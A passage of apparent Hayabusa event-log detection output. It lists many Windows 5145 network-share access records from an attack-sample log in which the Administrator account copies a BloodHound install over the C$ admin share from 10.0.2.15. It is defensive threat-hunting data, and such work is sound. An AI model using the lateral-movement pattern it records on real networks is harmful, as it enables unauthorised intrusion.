Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 